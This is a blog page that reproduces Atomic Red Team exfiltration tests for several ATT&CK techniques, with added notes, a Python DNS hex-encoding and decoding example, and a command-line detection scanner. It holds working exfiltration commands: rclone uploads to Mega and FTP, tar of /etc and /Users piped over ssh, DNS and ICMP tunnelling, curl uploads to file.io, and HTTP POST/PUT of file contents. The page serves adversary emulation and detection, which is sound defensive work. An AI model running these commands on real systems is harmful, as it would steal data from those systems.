
Atomic - Exfiltration

Date: 2023-09-15 16:35:49  Views: 44
Tags: Protocol, Exfiltration, Over, Atomic, file, Test, Alternative

Techniques covered (ATT&CK ID and name):

T1567.002  Exfiltration Over Web Service: Exfiltration to Cloud Storage
T1048      Exfiltration Over Alternative Protocol
T1048.003  Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
T1048.002  Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
T1041      Exfiltration Over C2 Channel
T1030      Data Transfer Size Limits
T1020      Automated Exfiltration


T1567.002

Exfiltrate data with rclone to cloud Storage - Mega (Windows)

New-Item #{rclone_config_path}\rclone -ItemType directory
New-Item #{rclone_config_path}\rclone\rclone.conf
cd #{rclone_path}
.\rclone.exe config create #{remote_share} mega
set-Content #{rclone_config_path}\rclone\rclone.conf "[#{remote_share}] `n type = mega `n user = #{mega_user_account} `n pass = #{mega_user_password}"
.\rclone.exe copy --max-size 1700k #{dir_to_copy} #{remote_share}:test -v

Detection indicator: rclone.exe (the config create and copy command lines name the remote type, and the test also writes the Mega user name and password in clear text into rclone.conf, so that file is worth collecting as well)


T1048

Exfiltration Over Alternative Protocol

Exfiltration Over Alternative Protocol - SSH

ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz

Exfiltration Over Alternative Protocol - SSH

tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'

openssl's -pass option takes a password source such as pass:<password>, env:<var> or file:<path>, so #{password} has to carry that prefix; with a bare word openssl rejects the argument and nothing is sent.

DNSExfiltration (doh)

Import-Module #{ps_module}
Invoke-DNSExfiltrator -i #{input_file} -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}

-i names the file to exfiltrate (the module path belongs only to Import-Module). With -doh the queries go to a DNS-over-HTTPS provider instead of the local resolver, so resolver logs on the host will not show them.

Detection indicator: Invoke-DNSExfiltrator (the cmdlet name appears in PowerShell script-block logging, and the module file is loaded by Import-Module)


T1048.003

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol

Exfiltration Over Alternative Protocol - HTTP

Run it with these steps:

1. Victim system configuration:

    mkdir /tmp/victim-staging-area
    echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt

2. Using Python to establish a one-line HTTP server on the victim system (SimpleHTTPServer is the Python 2 module; on Python 3 the equivalent is python3 -m http.server 1337):

    cd /tmp/victim-staging-area
    python -m SimpleHTTPServer 1337

3. To retrieve the data from an adversary system:

    wget http://VICTIM_IP:1337/victim-file.txt

Exfiltration Over Alternative Protocol - ICMP

$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }

Each 1024-byte chunk of the file travels as the payload of an ICMP echo request; the 1500 passed to Ping.Send is the timeout in milliseconds, not a size. -Encoding Byte is Windows PowerShell 5.1 syntax; PowerShell 7 reads raw bytes with -AsByteStream instead.

Exfiltration Over Alternative Protocol - DNS

Run it with these steps:

1. On the adversary machine run the command below. The display filter keeps only A-record queries (not responses) whose name ends in the collector zone, so the inner filter string is wrapped in single quotes:

    tshark -f "udp port 53" -Y 'dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"' >> received_data.txt

2. On the victim machine run the commands below. xxd -p emits 60 hex characters per line, so each line fits in one DNS label:

    xxd -p input_file > encoded_data.hex; for data in `cat encoded_data.hex`; do dig $data.domain; done

3. Once the data is received, recover it from the capture file:

    cat received_data.txt | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r

Note that sort | uniq puts the chunks in lexical order and drops repeats, so the reassembled file is only intact when the hex lines already happen to sort in their original order; a sequence number inside each label is what avoids that.
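The encode and decode steps above, as an added Python example that is not Atomic Red Team's code: it builds the 60-hex-character labels that xxd -p and dig produce, then parses tshark-style capture lines the way the cut pipeline does, but keeps packet order and skips only back-to-back retransmissions, so it does not share the sort | uniq reordering problem. The capture lines, the ".domain" collector zone and the sample file contents are constructed.

```python
"""Hex-label DNS exfiltration as in the test above: encode a file into
query names, then recover it from the collector's tshark capture.
Added example (not Atomic Red Team code); the capture lines are constructed."""
import binascii
import re

# xxd -p writes 60 hex characters (30 bytes) per line, and the test sends
# one line per query, so a label never exceeds the 63-byte DNS label limit.
HEX_PER_LABEL = 60

# Placeholder values, as in the test: ".domain" is the collector zone.
DOMAIN = "domain"
SECRET = b"this file will be exfiltrated over dns\n"   # constructed sample input


def encode_queries(data: bytes, domain: str = DOMAIN) -> list[str]:
    """Query names the victim would resolve, in transmission order."""
    hexdata = binascii.hexlify(data).decode("ascii")
    return [f"{hexdata[i:i + HEX_PER_LABEL]}.{domain}"
            for i in range(0, len(hexdata), HEX_PER_LABEL)]


def decode_capture(lines: list[str], domain: str = DOMAIN) -> bytes:
    """Rebuild the bytes from tshark one-line-per-packet output.

    Mirrors the tshark display filter: only A-record queries (response
    lines carry the word 'response' and never match) whose name ends in
    the collector zone count. Unlike the test's `sort | uniq`, packet order
    is kept and only back-to-back retransmissions of a chunk are dropped.
    """
    pattern = re.compile(
        r"Standard query 0x[0-9a-fA-F]+ A ([0-9a-fA-F]+)\."
        + re.escape(domain) + r"(?:\s|$)")
    chunks: list[str] = []
    for line in lines:
        m = pattern.search(line)
        if not m:
            continue
        label = m.group(1).lower()
        if chunks and chunks[-1] == label:   # dig retried the same query
            continue
        chunks.append(label)
    return binascii.unhexlify("".join(chunks))


def constructed_capture() -> list[str]:
    """Constructed tshark-style lines: the victim's queries, one retransmission,
    an unrelated lookup, and a response that the filter must ignore."""
    queries = encode_queries(SECRET)
    lines = [f"{n:>5} {n / 10:.6f} 10.0.0.5 -> 10.0.0.1 DNS 100 "
             f"Standard query 0x{0x1000 + n:04x} A {q}"
             for n, q in enumerate(queries, 1)]
    lines.insert(1, lines[0])   # retransmitted first chunk
    lines.append("   98 9.800000 10.0.0.5 -> 10.0.0.1 DNS 74 "
                 "Standard query 0xbeef A www.example.com")
    lines.append(f"   99 9.900000 10.0.0.1 -> 10.0.0.5 DNS 116 "
                 f"Standard query response 0x1001 A {queries[0]} A 127.0.0.1")
    return lines


if __name__ == "__main__":
    recovered = decode_capture(constructed_capture())
    print(recovered == SECRET, recovered)
```

The decoder accepts anything hex-shaped under the collector zone, which is exactly what a collector running the tshark filter sees; on the defensive side the same observation (long hex-only labels, many unique subdomains of one zone, queries but few useful answers) is what a DNS exfiltration rule keys on.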

Exfiltration Over Alternative Protocol - HTTP

$content = Get-Content #{input_file}
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content

Exfiltration Over Alternative Protocol - SMTP

Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}

MAZE FTP Upload

$Dir_to_copy = "$env:windir\temp"
$ftp = "ftp://#{ftp_server}/"
$web_client = New-Object System.Net.WebClient
$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
{foreach($file in (dir $Dir_to_copy "*.7z"))
{echo "Uploading $file..."
$uri = New-Object System.Uri($ftp+$file.name)
$web_client.UploadFile($uri, $file.FullName)}}
else
{echo "FTP Server Unreachable. Please verify the server address in input args and try again."}

Exfiltration Over Alternative Protocol - FTP - Rclone

$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate

Python3 http.server

if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi

T1048.002

Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Exfiltrate data HTTPS using curl windows

#{curl_path} -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/

Exfiltrate data HTTPS using curl linux

curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/

T1041

Exfiltration Over C2 Channel

C2 Data Exfiltration

if(-not (Test-Path #{filepath})){ 
  1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive

T1030

Data Transfer Size Limits

Data Transfer Size Limits

cd #{folder_path}; split -b 5000000 #{file_name}
ls -l #{folder_path}

T1020

Automated Exfiltration

IcedID Botnet HTTP PUT

$fileName = "#{file}"
$url = "#{domain}"
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
$contentType = "application/octet-stream"
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}
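The detection indicators noted for the tests above (rclone.exe against a cloud or FTP remote, Invoke-DNSExfiltrator, the ad-hoc Python HTTP server, curl uploads to file.io, Send-MailMessage with an attachment, split -b), as an added Python example that is not part of this page, of Atomic Red Team or of any vendor rule set: it runs command-line rules over constructed process-creation events. Host names, paths and the two benign control events are made up.

```python
"""Command-line indicators for the exfiltration tests on this page, run over
constructed process-creation events. Added example, not an Atomic Red Team
or vendor rule set; the events, hosts and paths are made up."""
import re

# (ATT&CK technique, what the matching test looks like, pattern over the
# command line). Patterns follow the commands shown above, case-insensitively.
RULES = [
    ("T1567.002", "rclone remote of a cloud-storage type (mega, drive, s3, ...)",
     re.compile(r"\brclone(\.exe)?\b.*\b(config create|copy|sync|move)\b.*"
                r"\b(mega|drive|s3|dropbox|b2|onedrive)\b", re.I)),
    ("T1048", "Invoke-DNSExfiltrator (DNS / DoH tunnelling)",
     re.compile(r"\bInvoke-DNSExfiltrator\b", re.I)),
    ("T1048.003", "ad-hoc Python HTTP server exposing a directory",
     re.compile(r"\bpython[23]?(\.exe)?\s+-m\s+(http\.server|SimpleHTTPServer)\b", re.I)),
    ("T1048.003", "rclone remote of type ftp",
     re.compile(r"\brclone(\.exe)?\b.*\bconfig create\b.*\bftp\b", re.I)),
    ("T1048.003", "Send-MailMessage with an attachment",
     re.compile(r"\bSend-MailMessage\b.*-Attachments\b", re.I)),
    ("T1048.002", "curl multipart upload to file.io",
     re.compile(r"\bcurl(\.exe)?\b.*-F\s+['\"]?file=@.*\bfile\.io\b", re.I)),
    ("T1030", "split -b chunking a file before transfer",
     re.compile(r"(?:^|[\s;&|])split\s+-b\s+\d+", re.I)),
]

# Constructed events (Sysmon event 1 / auditd style, reduced to the fields
# the rules need). Events 8 and 9 are benign and must not fire.
EVENTS = [
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r".\rclone.exe config create exfil mega"},
    {"id": 2, "host": "web01", "image": "/usr/bin/bash",
     "cmdline": "cd /tmp/victim-staging-area && python -m SimpleHTTPServer 1337"},
    {"id": 3, "host": "WS01", "image": "powershell.exe",
     "cmdline": r"Invoke-DNSExfiltrator -i C:\Users\Public\secret.docx -d example.test -p p4ss -doh google"},
    {"id": 4, "host": "web01", "image": "/usr/bin/bash",
     "cmdline": "curl -F 'file=@/etc/passwd' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/"},
    {"id": 5, "host": "web01", "image": "/usr/bin/bash",
     "cmdline": "cd /tmp; split -b 5000000 dump.tar"},
    {"id": 6, "host": "WS01", "image": "powershell.exe",
     "cmdline": r"Send-MailMessage -From a@x.test -To b@y.test -Subject hi -Attachments C:\t.zip -SmtpServer mail.x.test"},
    {"id": 7, "host": "WS01", "image": "powershell.exe",
     "cmdline": r'& C:\Users\Public\Downloads\rclone.exe config create ftpserver "ftp" "host" 10.0.0.9 "port" 21'},
    {"id": 8, "host": "web01", "image": "/usr/bin/bash", "cmdline": "python3 -m pip install requests"},
    {"id": 9, "host": "WS01", "image": "powershell.exe", "cmdline": r".\rclone.exe version"},
]


def scan(events):
    """One hit per (event, rule) match, in event order."""
    hits = []
    for ev in events:
        for technique, reason, pat in RULES:
            if pat.search(ev["cmdline"]):
                hits.append({"event": ev["id"], "host": ev["host"],
                             "technique": technique, "reason": reason})
    return hits


def techniques_by_event(events):
    """{event id: sorted technique ids} for the events that fired."""
    out = {}
    for h in scan(events):
        out.setdefault(h["event"], set()).add(h["technique"])
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for hit in scan(EVENTS):
        print(hit)
```

The rclone copy step of the tests names only the remote (for example exfil:test), so the cloud rule fires on config create, not on the transfer; pair it with file-write telemetry on rclone.conf, which the T1567.002 test writes with the credentials in clear text.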




From: https://blog.51cto.com/u_5139878/7483313
